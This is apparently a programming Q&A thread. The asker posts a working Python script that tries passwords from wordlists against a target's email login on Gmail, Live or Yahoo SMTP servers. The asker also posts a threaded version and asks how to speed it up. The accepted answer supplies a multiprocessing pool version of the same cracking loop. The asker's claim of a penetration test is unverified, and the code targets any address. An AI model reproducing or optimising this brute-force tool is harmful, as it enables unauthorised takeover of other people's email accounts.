# Python sharing a process or how to make an efficient brute force

Tags: python, python-2.7, smtp, brute-force, client-side-attacks

I need to share this process by 16 processes. I am purchasing a parallella board for it which has 16 cores and runs at 90gflops.

I am not going to do anything illegal. Just to prove my point that the use of password with 7 digit intgers is way too insecure for a organization to use. Further on I solved it already, I just want a better method.

This is the basic working script for it:

```
import smtplib
service = raw_input("Enter smtp service : ")
if service == "live":
        smtpserver = smtplib.SMTP("smtp.live.com", 587)
elif service == "gmail":
        smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
elif service == "yahoo":
        smtpserver = smtplib.SMTP("smtp.mail.yahoo.com", 587)
enter = raw_input("Enter text file name : ")
smtpserver.ehlo()
smtpserver.starttls()

user = raw_input("Enter the target's email address: ")
passwfile = open(enter, 'r')

for password in passwfile.readlines():
        password = password.strip()
        try:
                smtpserver.login(user, password)

                print "[+] Cracked password----> %s" % password
                break;
        except smtplib.SMTPAuthenticationError:
                smtpserver.ehlo()
                smtpserver.starttls()
                pass
```

So far tried:

```
import smtplib
from threading import Thread
service = raw_input("Enter smtp service : ")
if service == "live":
        smtpserver = smtplib.SMTP("smtp.live.com", 587)
elif service == "gmail":
        smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
elif service == "yahoo":
        smtpserver = smtplib.SMTP("smtp.mail.yahoo.com", 587)

user = raw_input("Enter the target's email address: ")
def tenth():
    smtpserver.ehlo()
    smtpserver.starttls()
    passwfile = open('10.txt', 'r')

    for password in passwfile.readlines():
            password = password.strip()
            try:
                    smtpserver.login(user, password)

                    print "[+] Cracked password----> %s" % password
                    break;
            except smtplib.SMTPAuthenticationError:
                    smtpserver.ehlo()
                    smtpserver.starttls()
                    pass
def att():
    smtpserver.ehlo()
    smtpserver.starttls()
    passwfile = open('9.txt', 'r')

    for password in passwfile.readlines():
            password = password.strip()
            try:
                    smtpserver.login(user, password)

                    print "[+] Cracked password----> %s" % password
                    break;
            except smtplib.SMTPAuthenticationError:
                    smtpserver.ehlo()
                    smtpserver.starttls()
                    pass
def atc():
    smtpserver.ehlo()
    smtpserver.starttls()
    passwfile = open('8.txt', 'r')

    for password in passwfile.readlines():
            password = password.strip()
            try:
                    smtpserver.login(user, password)

                    print "[+] Cracked password----> %s" % password
                    break;
            except smtplib.SMTPAuthenticationError:
                    smtpserver.ehlo()
                    smtpserver.starttls()
                    pass
def atk():
    smtpserver.ehlo()
    smtpserver.starttls()
    passwfile = open('7.txt', 'r')

    for password in passwfile.readlines():
            password = password.strip()
            try:
                    smtpserver.login(user, password)

                    print "[+] Cracked password----> %s" % password
                    break;
            except smtplib.SMTPAuthenticationError:
                    smtpserver.ehlo()
                    smtpserver.starttls()
                    pass
def attack():
    smtpserver.ehlo()
    smtpserver.starttls()
    passwfile = open('6.txt', 'r')

    for password in passwfile.readlines():
            password = password.strip()
            try:
                    smtpserver.login(user, password)

                    print "[+] Cracked password----> %s" % password
                    break;
            except smtplib.SMTPAuthenticationError:
                    smtpserver.ehlo()
                    smtpserver.starttls()
                    pass
def tr():
    smtpserver.ehlo()
    smtpserver.starttls()
    passwfile = open('5.txt', 'r')

    for password in passwfile.readlines():
            password = password.strip()
            try:
                    smtpserver.login(user, password)

                    print "[+] Cracked password----> %s" % password
                    break;
            except smtplib.SMTPAuthenticationError:
                    smtpserver.ehlo()
                    smtpserver.starttls()
                    pass
def br():
    smtpserver.ehlo()
    smtpserver.starttls()
    passwfile = open('4.txt', 'r')

    for password in passwfile.readlines():
            password = password.strip()
            try:
                    smtpserver.login(user, password)

                    print "[+] Cracked password----> %s" % password
                    break;
            except smtplib.SMTPAuthenticationError:
                    smtpserver.ehlo()
                    smtpserver.starttls()
                    pass
def bru():
    smtpserver.ehlo()
    smtpserver.starttls()
    passwfile = open('3.txt', 'r')

    for password in passwfile.readlines():
            password = password.strip()
            try:
                    smtpserver.login(user, password)

                    print "[+] Cracked password----> %s" % password
                    break;
            except smtplib.SMTPAuthenticationError:
                    smtpserver.ehlo()
                    smtpserver.starttls()
                    pass
def brute():
    smtpserver.ehlo()
    smtpserver.starttls()
    passwfile = open('2.txt', 'r')

    for password in passwfile.readlines():
            password = password.strip()
            try:
                    smtpserver.login(user, password)

                    print "[+] Cracked password----> %s" % password
                    break;
            except smtplib.SMTPAuthenticationError:
                    smtpserver.ehlo()
                    smtpserver.starttls()
                    pass
def arrgh():
    smtpserver.ehlo()
    smtpserver.starttls()
    passwfile = open('1.txt', 'r')

    for password in passwfile.readlines():
            password = password.strip()
            try:
                    smtpserver.login(user, password)

                    print "[+] Cracked password----> %s" % password
                    break;
            except smtplib.SMTPAuthenticationError:
                    smtpserver.ehlo()
                    smtpserver.starttls()
                    pass
thread1 = Thread(target = arrgh)
thread1.start()
thread2 = Thread(target = brute)
thread2.start()
thread3 = Thread(target = bru)
thread3.start()
thread4 = Thread(target = br)
thread4.start()
thread5 = Thread(target = tr)
thread5.start()
thread6 = Thread(target = att)
thread6.start()
thread7 = Thread(target = atc)
thread7.start()
thread8 = Thread(target = atk)
thread8.start()
thread9 = Thread(target = attack)
thread9.start()
thread10 = Thread(target = tenth)
thread10.start()
```

What this does is open multiple text files. I want it to be able to open one text file and run multiple processes from that itself.

Comment: is it a hack or a penetration test??

Comment: @CrakC penetration test. I am not going to do anything illegal. Just to prove my point that the use of password with 7 digit intgers is way too insecure for a organization to use. Further on I solved it already, I just want a better method

Answer (score 3, accepted):

First of all, if you are not I/O but CPU bound, you should use `multiprocessing` instead of `threading`. The later does not use more than one core, it just has several threads of control.

---

Second, since you are using py2.7, you might want to give pypy a try. It runs repeating python code much faster than standard CPython.

---

Third, ideally you should be using a pool of workers that each get work items from a queue. This automatically gives you load balancing and other features. In your case, you should create a global pool and have the functions push work to it, i.e. use [multiprocessing.Pool](https://docs.python.org/2/library/multiprocessing.html#multiprocessing.pool.multiprocessing.Pool) and one of its [map methods](https://docs.python.org/2/library/multiprocessing.html#multiprocessing.pool.multiprocessing.Pool.map_async).

You should probably have a setup *like* this:

```
import smtplib
import multiprocessing    

def test_passwords(passwords):
  smtpserver = smtplib.SMTP("totally.privat.server.com", 587)
  smtpserver.ehlo()
  smtpserver.starttls()
  for password in passwords:
    password = password.strip()
    try:
      smtpserver.login(user, password)
      print "[+] Cracked password----> %s" % password
      break
    except smtplib.SMTPAuthenticationError:
      smtpserver.ehlo()
      smtpserver.starttls()

workers = multiprocessing.Pool()

def try_my_own_passwords(workers):
   worker.map_async(test_passwords, open("my_pws.txt").readlines(), 100)
```